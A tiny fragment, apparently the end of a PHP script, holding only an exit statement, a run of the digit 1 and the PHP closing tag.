exit;11111111111111111111111
?>